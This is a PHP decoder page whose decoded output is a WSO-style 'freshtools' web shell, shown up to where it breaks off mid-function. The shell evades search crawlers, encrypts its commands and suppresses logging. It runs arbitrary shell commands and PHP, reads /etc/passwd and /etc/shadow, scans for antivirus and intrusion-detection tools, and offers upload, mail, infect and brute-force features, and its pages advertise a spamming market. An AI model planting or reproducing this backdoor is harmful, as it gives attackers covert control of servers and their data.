Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php eval( str_rot13( gzuncompress( base64_decode( ..
Decoded Output download
$ = 'c1dba739eb9f16334b0d103e2f97ea85';
$ = true;
$ = 'UTF-8';
$ = 'FilesMan';
$ = md5($_SERVER['HTTP_USER_AGENT']);
if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'key'])) {
prototype(md5($_SERVER['HTTP_HOST']) . 'key', $);
}
if (empty($_POST['charset'])) {
$_POST['charset'] = $;
}
if (!isset($_POST['ne'])) {
if (isset($_POST['a'])) {
$_POST['a'] = iconv(
'utf-8',
$_POST['charset'],
decrypt($_POST['a'], $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'key'])
);
}
if (isset($_POST['c'])) {
$_POST['c'] = iconv(
'utf-8',
$_POST['charset'],
decrypt($_POST['c'], $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'key'])
);
}
if (isset($_POST['p1'])) {
$_POST['p1'] = iconv(
'utf-8',
$_POST['charset'],
decrypt($_POST['p1'], $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'key'])
);
}
if (isset($_POST['p2'])) {
$_POST['p2'] = iconv(
'utf-8',
$_POST['charset'],
decrypt($_POST['p2'], $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'key'])
);
}
if (isset($_POST['p3'])) {
$_POST['p3'] = iconv(
'utf-8',
$_POST['charset'],
decrypt($_POST['p3'], $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'key'])
);
}
}
function decrypt($str, $pwd)
{
$pwd = base64_encode($pwd);
$str = base64_decode($str);
$enc_chr = '';
$enc_str = '';
$i = 0;
while ($i < strlen($str)) {
for ($j = 0; $j < strlen($pwd); $j++) {
$enc_chr = chr(ord($str[$i]) ^ ord($pwd[$j]));
$enc_str .= $enc_chr;
$i++;
if ($i >= strlen($str)) {
break;
}
}
}
return base64_decode($enc_str);
}
@ini_set('error_log', null);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@set_time_limit(0);
@define('VERSION', '1.0');
/* () 11.2011 oRb */
if (!empty($)) {
if (isset($_POST['pass']) && md5($_POST['pass']) == $) {
prototype(md5($_SERVER['HTTP_HOST']), $);
}
if (
!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) ||
$_COOKIE[md5($_SERVER['HTTP_HOST'])] != $
) {
hardLogin();
}
}
if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'])) {
$_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool) $;
}
function hardLogin()
{
if (!empty($_SERVER['HTTP_USER_AGENT'])) {
$userAgents = [
'Google',
'Slurp',
'MSNBot',
'ia_archiver',
'Yandex',
'Rambler',
];
if (
preg_match(
'/' . implode('|', $userAgents) . '/i',
$_SERVER['HTTP_USER_AGENT']
)
) {
header('HTTP/1.0 404 Not Found');
exit();
}
}
die(
"<html><head>
<meta name='description' content='Freshtools.net | Freshtools.pw | Freshtools.to| FreshTools | Best Spamming Shop | Underground Market'>
<meta name='keywords' content='Freshtools.net | Freshtools.pw | Freshtools.to| FreshTools | Best Spamming Shop | Underground Market'>
<meta name='author' content='FreshTools'>
<meta http-equiv='Content-Type' content='text/html; charset=" .
$_POST['charset'] .
"'><title>" .
$_SERVER['HTTP_HOST'] .
' freshtools wso ' .
VERSION .
"</title> </head><body><div style='background-color: #040d14;
background-image: url(https://www.transparenttextures.com/patterns/gradient-squares.png);
position: absolute;
height: 100%;
width: 100%;
top: 0;
bottom: 0;
left: 0;
right: 0;
display: flex;
justify-content: center;'><pre align=center><form method=post><p style='font-size: 18px;
color: #fff;
font-weight: bold;
'>Password</p><input type=password name=pass style='margin-right: 0px;
color: #fff;
background-color: #202832;
border: none;
font: 9pt Courier New;
outline: none;
height: 31px;
border-radius: 12px;
width:200px;
margin-right: 6px;outline:none;' required><input type=submit name='mypass' value='submit' style='border:none;background-color:#margin-right: 0px;
color: #fff;
background-color: #202832;
border: none;
font: 9pt Courier New;
outline: none;
height: 31px;
border-radius: 12px;
margin-right: 6px;;color:#fff;cursor:pointer;'></form></pre></div></body></html>"
);
}
if (strtolower(substr(PHP_OS, 0, 3)) == 'win') {
$os = 'win';
} else {
$os = 'nix';
}
$safe_mode = @ini_get('safe_mode');
if (!$safe_mode) {
error_reporting(0);
}
$disable_functions = @ini_get('disable_functions');
$home_cwd = @getcwd();
if (isset($_POST['c'])) {
@chdir($_POST['c']);
}
$cwd = @getcwd();
if ($os == 'win') {
$home_cwd = str_replace('\', '/', $home_cwd);
$cwd = str_replace('\', '/', $cwd);
}
if ($cwd[strlen($cwd) - 1] != '/') {
$cwd .= '/';
}
/* () 04.2015 Pirat */
function hardHeader()
{
if (empty($_POST['charset'])) {
$_POST['charset'] = $GLOBALS[''];
}
echo "<html><head>
<meta name='description' content='Freshtools.net | Freshtools.pw | Freshtools.to| FreshTools | Best Spamming Shop | Underground Market'>
<meta name='keywords' content='Freshtools.net | Freshtools.pw | Freshtools.to| FreshTools | Best Spamming Shop | Underground Market'>
<meta name='author' content='FreshTools'>
<meta http-equiv='Content-Type' content='text/html; charset=" .
$_POST['charset'] .
"'><title>" .
$_SERVER['HTTP_HOST'] .
' freshtools wso ' .
VERSION .
"</title>
<style>
body { background: rgb(250,250,250);
background: linear-gradient(180deg, rgba(250,250,250,1) 27%, rgba(251,233,231,0.9009804605435925) 100%); height:100% }
#particles-js{width: 100%; height: 100px; background-color: #060a10; background-image: url(''); background-repeat: no-repeat; background-size: cover; background-position: 50% 50%;}
body,td,th {font:10pt tahoma,arial,verdana,sans-serif,Lucida Sans;margin:0;vertical-align:top;}
table.info {color:#757575;}
span,h1,a {color:#616161 !important;}
span {font-weight:bolder;}
h1 {border-left:20px solid #E91E63;border-bottom-left-radius:8px;border-top-left-radius:8px;padding:2px 5px;font:14pt Verdana;margin-left:5px;margin-top:8px;margin-bottom:8px}
div.content {padding: 10px;
margin: 15px;
box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;
background:#fff;
border-radius: 8px;}
a {text-decoration:none;}
a:hover {text-decoration:underline;}
.tooltip::after {background:#0663D5;color:#FFF;content: attr(data-tooltip);margin-top:-50px;display:block;padding:6px 10px;position:absolute;visibility:hidden;}
.tooltip:hover::after {opacity:1;visibility:visible;}
.ml1 {border: 3px solid #FFF3E0;
background: #FFF8E1;
padding: 10px;
margin: 3px;
overflow: auto;
background: rgba();
color: #424242;
border-radius: 6px;}
.bigarea {min-width:100%;max-width:100%;height:400px; height: 31px;}
input, textarea , select {margin: 0;
margin-right: 0px;
border-radius: 12px;
margin-right: 6px;
height: calc(1.6em + 0.75rem + 2px);
padding: 0.375rem 0.75rem;
font-size: 0.9rem;
font-weight: 400;
line-height: 1.6;
color: #495057;
background-color: #fff;
label::before {
display:none;
}
label::after {
display:none;
}
background-clip: padding-box;
border: 1px solid #ced4da;
border-radius: 0.25rem;
transition: border-color 0.15s ease-in-out, box-shadow 0.15s ease-in-out;
}
label {position:relative}
form {margin:0px;}
#toolsTbl {text-align:center;}
#fak {background:none;}
#fak td {padding:5px 0 0 0;}
iframe {border:1px solid #060a10;}
.toolsInp {width:300px}
.main th {text-align: left;
font-weight: bold;
font-size: 16px;
color: #B0BEC5 !important;}
.main th a{
color:#B0BEC5!important;
}
.main tr:hover{background-color:#FBE9E7; cursor: pointer;
}
.main td, th{vertical-align:middle;}
input[type='submit'] , input[type='button']{
background: #EC407A; /* fallback for old browsers */
background: -webkit-linear-gradient(to right, #EC407A, #E91E63); /* Chrome 10-25, Safari 5.1-6 */
background: linear-gradient(to right, #EC407A, #E91E63); /* W3C, IE 10+/ Edge, Firefox 16+, Chrome 26+, Opera 12+, Safari 7+ */
text-align: center;
transition: 0.5s;
background-size: 200% auto;
color: white !important;
border-radius: 10px;
border: none;
box-shadow: none;
}
input[type='submit']:hover , input[type='button']:hover {
background-position: right center; /* change the direction of the change here */
color: #fff;
text-decoration: none;
cursor: pointer;
}
.l1 {background-color:#EEEEEE;}
pre {font:9pt Courier New;}
.menu-header{
background: #fff;
height: 49px;
display: flex;
align-items: center;
justify-content: center;
box-shadow: rgba(149, 157, 165, 0.2) 0px 8px 24px;
margin-top:8px;
margin-bottom:8px;
}
.menu-header table{
height:40px;
}
.content table tr{
height:23px;
color:#616161
}
.send_mail_form input[type='text']{
width:40%;
}
.send_mail_form textarea{
width:40%;
height:120px;
}
.tab-item{
padding: 7px;
width: 106px;
margin-left: 23px;
background: #56ab2f; /* fallback for old browsers */
background: -webkit-linear-gradient(to right, #56ab2f, #a8e063); /* Chrome 10-25, Safari 5.1-6 */
background: linear-gradient(to right, #56ab2f, #a8e063); /* W3C, IE 10+/ Edge, Firefox 16+, Chrome 26+, Opera 12+, Safari 7+ */
padding: 9px;
text-align: center;
transition: 0.5s;
background-size: 200% auto;
color: white !important;
border-radius: 10px;
border: none;
box-shadow: none;
}
.tab-item:hover{
background-position: right center; /* change the direction of the change here */
color: #fff;
text-decoration: none;
cursor: pointer;
}
.badge-info {
background: #E0E0E0;
color: #616161 !important;
padding: 5px;
border-radius: 15px;
}
.output-result{
padding: 10px;
margin: 3px;
overflow: auto;
border-radius:5px;
margin-top:10px;
margin-bottom:20px;
min-height:50px;
border: 3px solid #FFF3E0;
background: #FFF8E1;
}
</style>
<script>
var c_ = '" .
htmlspecialchars($GLOBALS['cwd']) .
"';
var a_ = '" .
htmlspecialchars(@$_POST['a']) .
"'
var charset_ = '" .
htmlspecialchars(@$_POST['charset']) .
"';
var p1_ = '" .
(strpos(@$_POST['p1'], "
") !== false
? ''
: htmlspecialchars($_POST['p1'], ENT_QUOTES)) .
"';
var p2_ = '" .
(strpos(@$_POST['p2'], "
") !== false
? ''
: htmlspecialchars($_POST['p2'], ENT_QUOTES)) .
"';
var p3_ = '" .
(strpos(@$_POST['p3'], "
") !== false
? ''
: htmlspecialchars($_POST['p3'], ENT_QUOTES)) .
"';
var d = document;
function encrypt(str,pwd){if(pwd==null||pwd.length<=0){return null;}str=base64_encode(str);pwd=base64_encode(pwd);var enc_chr='';var enc_str='';var i=0;while(i<str.length){for(var j=0;j<pwd.length;j++){enc_chr=str.charCodeAt(i)^pwd.charCodeAt(j);enc_str+=String.fromCharCode(enc_chr);i++;if(i>=str.length)break;}}return base64_encode(enc_str);}
function utf8_encode(argString){var string=(argString+'');var utftext='',start,end,stringl=0;start=end=0;stringl=string.length;for(var n=0;n<stringl;n++){var c1=string.charCodeAt(n);var enc=null;if(c1<128){end++;}else if(c1>127&&c1<2048){enc=String.fromCharCode((c1>>6)|192)+String.fromCharCode((c1&63)|128);}else{enc=String.fromCharCode((c1>>12)|224)+String.fromCharCode(((c1>>6)&63)|128)+String.fromCharCode((c1&63)|128);}if(enc!==null){if(end>start){utftext+=string.slice(start,end);}utftext+=enc;start=end=n+1;}}if(end>start){utftext+=string.slice(start,stringl);}return utftext;}
function base64_encode(data){var b64 = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var o1,o2,o3,h1,h2,h3,h4,bits,i=0,ac=0,enc='',tmp_arr=[];if (!data){return data;}data=utf8_encode(data+'');do{o1=data.charCodeAt(i++);o2=data.charCodeAt(i++);o3=data.charCodeAt(i++);bits=o1<<16|o2<<8|o3;h1=bits>>18&0x3f;h2=bits>>12&0x3f;h3=bits>>6&0x3f;h4=bits&0x3f;tmp_arr[ac++]=b64.charAt(h1)+b64.charAt(h2)+b64.charAt(h3)+b64.charAt(h4);}while(i<data.length);enc=tmp_arr.join('');switch (data.length%3){case 1:enc=enc.slice(0,-2)+'==';break;case 2:enc=enc.slice(0,-1)+'=';break;}return enc;}
function set(a,c,p1,p2,p3,charset) {
if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;
if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;
if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;
if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;
if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;
d.mf.a.value = encrypt(d.mf.a.value,'" .
$_COOKIE[md5($_SERVER['HTTP_HOST']) . 'key'] .
"');
d.mf.c.value = encrypt(d.mf.c.value,'" .
$_COOKIE[md5($_SERVER['HTTP_HOST']) . 'key'] .
"');
d.mf.p1.value = encrypt(d.mf.p1.value,'" .
$_COOKIE[md5($_SERVER['HTTP_HOST']) . 'key'] .
"');
d.mf.p2.value = encrypt(d.mf.p2.value,'" .
$_COOKIE[md5($_SERVER['HTTP_HOST']) . 'key'] .
"');
d.mf.p3.value = encrypt(d.mf.p3.value,'" .
$_COOKIE[md5($_SERVER['HTTP_HOST']) . 'key'] .
"');
if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
}
function g(a,c,p1,p2,p3,charset) {
set(a,c,p1,p2,p3,charset);
d.mf.submit();
}
function a(a,c,p1,p2,p3,charset) {
set(a,c,p1,p2,p3,charset);
var params = 'ajax=true';
for(i=0;i<d.mf.elements.length;i++)
params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);
sr('" .
addslashes($_SERVER['REQUEST_URI']) .
"', params);
}
function sr(url, params) {
if (window.XMLHttpRequest)
req = new XMLHttpRequest();
else if (window.ActiveXObject)
req = new ActiveXObject('Microsoft.XMLHTTP');
if (req) {
req.onreadystatechange = processReqChange;
req.open('POST', url, true);
req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded');
req.send(params);
}
}
function processReqChange() {
if( (req.readyState == 4) )
if(req.status == 200) {
var reg = new RegExp(\"(\d+)([\S\s]*)\", 'm');
var arr=reg.exec(req.responseText);
eval(arr[2].substr(0, arr[1]));
} else alert('Request error!');
}
</script>
<head><body><div>
<form method=post name=mf style='display:none;'>
<input type=hidden name=a>
<input type=hidden name=c>
<input type=hidden name=p1>
<input type=hidden name=p2>
<input type=hidden name=p3>
<input type=hidden name=charset>
</form>";
$freeSpace = @diskfreespace($GLOBALS['cwd']);
$totalSpace = @disk_total_space($GLOBALS['cwd']);
$totalSpace = $totalSpace ? $totalSpace : 1;
$release = @php_uname('r');
$kernel = @php_uname('s');
$explink =
'http://noreferer.de/?http://www.exploit-db.com/search/?action=search&description=';
if (strpos('Linux', $kernel) !== false) {
$explink .= urlencode('Linux Kernel ' . substr($release, 0, 6));
} else {
$explink .= urlencode($kernel . ' ' . substr($release, 0, 3));
}
if (!function_exists('posix_getegid')) {
$user = @get_current_user();
$uid = @getmyuid();
$gid = @getmygid();
$group = '?';
} else {
$uid = @posix_getpwuid(@posix_geteuid());
$gid = @posix_getgrgid(@posix_getegid());
$user = $uid['name'];
$uid = $uid['uid'];
$group = $gid['name'];
$gid = $gid['gid'];
}
$cwd_links = '';
$path = explode('/', $GLOBALS['cwd']);
$n = count($path);
for ($i = 0; $i < $n - 1; $i++) {
$cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\"";
for ($j = 0; $j <= $i; $j++) {
$cwd_links .= $path[$j] . '/';
}
$cwd_links .= "\")'>" . $path[$i] . '/</a>';
}
$charsets = ['UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866'];
$opt_charsets = '';
foreach ($charsets as $) {
$opt_charsets .=
'<option value="' .
$ .
'" ' .
($_POST['charset'] == $ ? 'selected' : '') .
'>' .
$ .
'</option>';
}
$m = [
'Sec. Info' => 'SecInfo',
'Files' => 'FilesMan',
'Send mail' => 'SendMail',
'Console' => 'Console',
'Infect' => 'Infect',
'Sql' => 'Sql',
'Php' => 'Php',
'Safe mode' => 'SafeMode',
'String tools' => 'StringTools',
'Bruteforce' => 'Bruteforce',
'Network' => 'Network',
];
if (!empty($GLOBALS[''])) {
$m['Logout'] = 'Logout';
}
$m['Self remove'] = 'SelfRemove';
$menu = '';
foreach ($m as $k => $v) {
$menu .=
'<button class="tab-item" onclick="g(\'' .
$v .
'\',null,\'\',\'\',\'\')">' .
$k .
'</button>';
}
$drives = '';
if ($GLOBALS['os'] == 'win') {
foreach (range('c', 'z') as $drive) {
if (is_dir($drive . ':\')) {
$drives .=
'<a href="#" onclick="g(\'FilesMan\',\'' .
$drive .
':/\')">[ ' .
$drive .
' ]</a> ';
}
}
}
/* () 08.2015 dmkcv */
echo '<table class="info" cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:' .
($GLOBALS['os'] == 'win' ? '<br>Drives:' : '') .
'</span></td>' .
'<td><nobr>' .
substr(@php_uname(), 0, 120) .
' <a href="http://noreferer.de/?http://www.google.com/search?q=' .
urlencode(@php_uname()) .
'" target="_blank">[ Google ]</a> <a href="' .
$explink .
'" target=_blank>[ Exploit-DB ]</a></nobr><br>' .
$uid .
' ( ' .
$user .
' ) <span>Group:</span> ' .
$gid .
' ( ' .
$group .
' )<br>' .
@phpversion() .
' <span>Safe mode:</span> ' .
($GLOBALS['safe_mode']
? '<font color=red>ON</font>'
: '<font color=#FFDB5F><b>OFF</b></font>') .
' <a href=# onclick="g(\'Php\',null,null,\'info\')">[ phpinfo ]</a> <span>Datetime:</span> ' .
date('Y-m-d H:i:s') .
'<br>' .
viewSize($totalSpace) .
' <span>Free:</span> ' .
viewSize($freeSpace) .
' (' .
round(100 / ($totalSpace / $freeSpace), 2) .
'%)<br>' .
$cwd_links .
' ' .
viewPermsColor($GLOBALS['cwd']) .
' <a href=# onclick="g(\'FilesMan\',\'' .
$GLOBALS['home_cwd'] .
'\',\'\',\'\',\'\')">[ home ]</a><br>' .
$drives .
'</td>' .
'<td><h1 style="border:none">Freshtools</h1></td>' .
'<td width=1 align=right><nobr><label><select onchange="g(null,null,null,null,null,this.value)">' .
$opt_charsets .
'</select></label><br><span>Server IP:</span><br>' .
gethostbyname($_SERVER['HTTP_HOST']) .
'<br><span>Client IP:</span><br>' .
$_SERVER['REMOTE_ADDR'] .
'</nobr></td></tr></table>' .
'<div class="menu-header">' .
$menu .
'</div><div>';
}
function hardFooter()
{
$is_writable = is_writable($GLOBALS['cwd'])
? " <font color='#FFDB5F'>[ Writeable ]</font>"
: ' <font color=red>(Not writable)</font>';
echo "
</div>
<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100%>
<tr>
<td><form onsubmit=\"" .
(function_exists('actionFilesMan') ? "g(null,this.c.value,'');" : '') .
"return false;\"><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='" .
htmlspecialchars($GLOBALS['cwd']) .
"'><input type=submit value='submit'></form></td>
<td><form onsubmit=\"" .
(function_exists('actionFilesTools')
? "g('FilesTools',null,this.f.value);"
: '') .
"return false;\"><span>Read file:</span><br><input class='toolsInp' type=text name=f required><input type=submit value='submit'></form></td>
</tr><tr>
<td><form onsubmit=\"" .
(function_exists('actionFilesMan')
? "g('FilesMan',null,'mkdir',this.d.value);"
: '') .
"return false;\"><span>Make dir:</span>$is_writable<br><input class='toolsInp' type=text name=d required><input type=submit value='submit'></form></td>
<td><form onsubmit=\"" .
(function_exists('actionFilesTools')
? "g('FilesTools',null,this.f.value,'mkfile');"
: '') .
"return false;\"><span>Make file:</span>$is_writable<br><input class='toolsInp' type=text name=f required><input type=submit value='submit'></form></td>
</tr><tr>
<td><form onsubmit=\"" .
(function_exists('actionConsole')
? "g('Console',null,this.c.value);"
: '') .
"return false;\"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='submit'></form></td>
<td><form method='post' " .
(!function_exists('actionFilesMan')
? " onsubmit=\"return false;\" "
: '') .
"ENCTYPE='multipart/form-data'>
<input type=hidden name=a value='FilesMan'>
<input type=hidden name=c value='" .
htmlspecialchars($GLOBALS['cwd']) .
"'>
<input type=hidden name=p1 value='uploadFile'>
<input type=hidden name=ne value=''>
<input type=hidden name=charset value='" .
(isset($_POST['charset']) ? $_POST['charset'] : '') .
"'>
<span>Upload file:</span>$is_writable<br><input class='toolsInp' type=file name=f[] multiple><input type=submit value='submit'></form><br ></td>
</tr></table></div>
</body></html>";
}
if (
!function_exists('posix_getpwuid') &&
strpos($GLOBALS['disable_functions'], 'posix_getpwuid') === false
) {
function posix_getpwuid($p)
{
return false;
}
}
if (
!function_exists('posix_getgrgid') &&
strpos($GLOBALS['disable_functions'], 'posix_getgrgid') === false
) {
function posix_getgrgid($p)
{
return false;
}
}
function ex($in)
{
$ = '';
if (function_exists('exec')) {
@exec($in, $);
$ = @join("
", $);
} elseif (function_exists('passthru')) {
ob_start();
@passthru($in);
$ = ob_get_clean();
} elseif (function_exists('system')) {
ob_start();
@system($in);
$ = ob_get_clean();
} elseif (function_exists('shell_exec')) {
$ = shell_exec($in);
} elseif (is_resource($f = @popen($in, 'r'))) {
$ = '';
while (!@feof($f)) {
$ .= fread($f, 1024);
}
pclose($f);
} else {
return " Unable to execute command
";
}
return $ == '' ? " Query did not return anything
" : $;
}
function viewSize($s)
{
if ($s >= 1073741824) {
return sprintf('%1.2f', $s / 1073741824) . ' GB';
} elseif ($s >= 1048576) {
return sprintf('%1.2f', $s / 1048576) . ' MB';
} elseif ($s >= 1024) {
return sprintf('%1.2f', $s / 1024) . ' KB';
} else {
return $s . ' B';
}
}
function perms($p)
{
if (($p & 0xc000) == 0xc000) {
$i = 's';
} elseif (($p & 0xa000) == 0xa000) {
$i = 'l';
} elseif (($p & 0x8000) == 0x8000) {
$i = '-';
} elseif (($p & 0x6000) == 0x6000) {
$i = 'b';
} elseif (($p & 0x4000) == 0x4000) {
$i = 'd';
} elseif (($p & 0x2000) == 0x2000) {
$i = 'c';
} elseif (($p & 0x1000) == 0x1000) {
$i = 'p';
} else {
$i = 'u';
}
$i .= $p & 0x0100 ? 'r' : '-';
$i .= $p & 0x0080 ? 'w' : '-';
$i .= $p & 0x0040 ? ($p & 0x0800 ? 's' : 'x') : ($p & 0x0800 ? 'S' : '-');
$i .= $p & 0x0020 ? 'r' : '-';
$i .= $p & 0x0010 ? 'w' : '-';
$i .= $p & 0x0008 ? ($p & 0x0400 ? 's' : 'x') : ($p & 0x0400 ? 'S' : '-');
$i .= $p & 0x0004 ? 'r' : '-';
$i .= $p & 0x0002 ? 'w' : '-';
$i .= $p & 0x0001 ? ($p & 0x0200 ? 't' : 'x') : ($p & 0x0200 ? 'T' : '-');
return $i;
}
function viewPermsColor($f)
{
if (!@is_readable($f)) {
return '<font color=#FF0000><b>' .
perms(@fileperms($f)) .
'</b></font>';
} elseif (!@is_writable($f)) {
return '<font ><b>' . perms(@fileperms($f)) . '</b></font>';
} else {
return '<font color=#FFDB5F><b>' .
perms(@fileperms($f)) .
'</b></font>';
}
}
function hardScandir($dir)
{
if (function_exists('scandir')) {
return scandir($dir);
} else {
$dh = opendir($dir);
while (false !== ($filename = readdir($dh))) {
$files[] = $filename;
}
return $files;
}
}
function which($p)
{
$path = ex('which ' . $p);
if (!empty($path)) {
return $path;
}
return false;
}
function actionRC()
{
if (!@$_POST['p1']) {
$a = [
'uname' => php_uname(),
'php_version' => phpversion(),
'VERSION' => VERSION,
'safemode' => @ini_get('safe_mode'),
];
echo serialize($a);
} else {
eval($_POST['p1']);
}
}
function prototype($k, $v)
{
$_COOKIE[$k] = $v;
setcookie($k, $v);
}
function actionSecInfo()
{
hardHeader();
echo '<h1>Server security information</h1><div class=content>';
function showSecParam($n, $v)
{
$v = trim($v);
if ($v) {
echo '<span>' . $n . ': </span>';
if (strpos($v, "
") === false) {
echo $v . '<br>';
} else {
echo '<pre class=ml1>' . $v . '</pre>';
}
}
}
showSecParam('Server software', @getenv('SERVER_SOFTWARE'));
if (function_exists('apache_get_modules')) {
showSecParam(
'Loaded Apache modules',
implode(', ', apache_get_modules())
);
}
showSecParam(
'Disabled PHP Functions',
$GLOBALS['disable_functions'] ? $GLOBALS['disable_functions'] : 'none'
);
showSecParam('Open base dir', @ini_get('open_basedir'));
showSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
showSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
showSecParam(
'cURL support',
function_exists('curl_version') ? 'enabled' : 'no'
);
$temp = [];
if (function_exists('mysql_get_client_info')) {
$temp[] = 'MySql (' . mysql_get_client_info() . ')';
}
if (function_exists('mssql_connect')) {
$temp[] = 'MSSQL';
}
if (function_exists('pg_connect')) {
$temp[] = 'PostgreSQL';
}
if (function_exists('oci_connect')) {
$temp[] = 'Oracle';
}
showSecParam('Supported databases', implode(', ', $temp));
echo '<br>';
if ($GLOBALS['os'] == 'nix') {
showSecParam(
'Readable /etc/passwd',
@is_readable('/etc/passwd')
? "yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>"
: 'no'
);
showSecParam(
'Readable /etc/shadow',
@is_readable('/etc/shadow')
? "yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"shadow\")'>[view]</a>"
: 'no'
);
showSecParam('OS version', @file_get_contents('/proc/version'));
showSecParam('Distr name', @file_get_contents('/etc/issue.net'));
if (!$GLOBALS['safe_mode']) {
$userful = [
'gcc',
'lcc',
'cc',
'ld',
'make',
'php',
'perl',
'python',
'ruby',
'tar',
'gzip',
'bzip',
'bzip2',
'nc',
'locate',
'suidperl',
];
$danger = [
'kav',
'nod32',
'bdcored',
'uvscan',
'sav',
'drwebd',
'clamd',
'rkhunter',
'chkrootkit',
'iptables',
'ipfw',
'tripwire',
'shieldcc',
'portsentry',
'snort',
'ossec',
'lidsadm',
'tcplodg',
'sxid',
'logcheck',
'logwatch',
'sysmask',
'zmbscap',
'sawmill',
'wormscan',
'ninja',
];
$downloaders = [
'wget',
'fetch',
'lynx',
'links',
'curl',
'get',
'lwp-mirror',
];
echo '<br>';
$temp = [];
foreach ($userful as $) {
if (which($)) {
$temp[] = $;
}
}
showSecParam('Userful', implode(', ', $temp));
$temp = [];
foreach ($danger as $) {
if (which($)) {
$temp[] = $;
}
}
showSecParam('Danger', implode(', ', $temp));
$temp = [];
foreach ($downloaders as $) {
if (which($)) {
$temp[] = $;
}
}
showSecParam('Downloaders', implode(', ', $temp));
echo '<br/>';
showSecParam('HDD space', ex('df -h'));
showSecParam('Hosts', @file_get_contents('/etc/hosts'));
showSecParam('Mount options', @file_get_contents('/etc/fstab'));
}
} else {
showSecParam('OS Version', ex('ver'));
showSecParam(
'Account Settings',
iconv('CP866', 'UTF-8', ex('net accounts'))
);
showSecParam('User Accounts', iconv('CP866', 'UTF-8', ex('net user')));
}
echo '</div>';
hardFooter();
}
function actionFilesTools()
{
if (isset($_POST['p1'])) {
$_POST['p1'] = urldecode($_POST['p1']);
}
if (@$_POST['p2'] == 'download') {
if (@is_file($_POST['p1']) && @is_readable($_POST['p1'])) {
ob_start('ob_gzhandler', 4096);
header(
'Content-Disposition: attachment; filename=' .
basename($_POST['p1'])
);
if (function_exists('mime_content_type')) {
$type = @mime_content_type($_POST['p1']);
header('Content-Type: ' . $type);
} else {
header('Content-Type: application/octet-stream');
}
$fp = @fopen($_POST['p1'], 'r');
if ($fp) {
while (!@feof($fp)) {
echo @fread($fp, 1024);
}
fclose($fp);
}
}
exit();
}
if (@$_POST['p2'] == 'mkfile') {
if (!file_exists($_POST['p1'])) {
$fp = @fopen($_POST['p1'], 'w');
if ($fp) {
$_POST['p2'] = 'edit';
fclose($fp);
}
}
}
hardHeader();
echo '<h1>File tools</h1><div class=content>';
if (!file_exists(@$_POST['p1'])) {
echo 'File not exists';
hardFooter();
return;
}
$uid = @posix_getpwuid(@fileowner($_POST['p1']));
if (!$uid) {
$uid['name'] = @fileowner($_POST['p1']);
$gid['name'] = @filegroup($_POST['p1']);
} else {
$gid = @posix_getgrgid(@filegroup($_POST['p1']));
}
echo '<div style="display: block ruby;"><span style="margin-left:8px">Name:</span> ' .
'<span class="badge-info">' .
htmlspecialchars(@basename($_POST['p1'])) .
'</span>' .
'<span style="margin-left:8px">Size:</span> ' .
'<span class="badge-info">' .
(is_file($_POST['p1']) ? viewSize(filesize($_POST['p1'])) : '-') .
'</span>' .
'<span style="margin-left:8px">Permission:</span> ' .
'<span class="badge-info">' .
viewPermsColor($_POST['p1']) .
'</span>' .
'<span style="margin-left:8px">Owner/Group:</span> ' .
'<span class="badge-info">' .
$uid['name'] .
'/' .
$gid['name'] .
'</span></div>' .
'<br>';
echo '<br/><span>Create time:</span> ' .
'<span class="badge-info">' .
date('Y-m-d H:i:s', filectime($_POST['p1'])) .
'</span>' .
' <br/><br/><span>Access time:</span> ' .
'<span class="badge-info">' .
date('Y-m-d H:i:s', fileatime($_POST['p1'])) .
'</span>' .
' <br/><br/><span>Modify time:</span> ' .
'<span class="badge-info">' .
date('Y-m-d H:i:s', filemtime($_POST['p1'])) .
'</span>' .
'<br><br>';
if (empty($_POST['p2'])) {
$_POST['p2'] = 'view';
}
if (is_file($_POST['p1'])) {
$m = [
'View',
'Highlight',
'Download',
'Hexdump',
'Edit',
'Chmod',
'Rename',
'Touch',
'Frame',
];
} else {
$m = ['Chmod', 'Rename', 'Touch'];
}
foreach ($m as $v) {
echo '<a href=# onclick="g(null,null,\'' .
urlencode($_POST['p1']) .
'\',\'' .
strtolower($v) .
'\')">' .
(strtolower($v) == @$_POST['p2'] ? '<b>[ ' . $v . ' ]</b>' : $v) .
'</a> ';
}
echo '<br><br>';
switch ($_POST['p2']) {
case 'view':
echo '<pre class=ml1>';
$fp = @fopen($_POST['p1'], 'r');
if ($fp) {
while (!@feof($fp)) {
echo htmlspecialchars(@fread($fp, 1024));
}
@fclose($fp);
}
echo '</pre>';
break;
case 'highlight':
if (@is_readable($_POST['p1'])) {
echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">';
$oRb = @highlight_file($_POST['p1'], true);
echo str_replace(
['<span ', '</span>'],
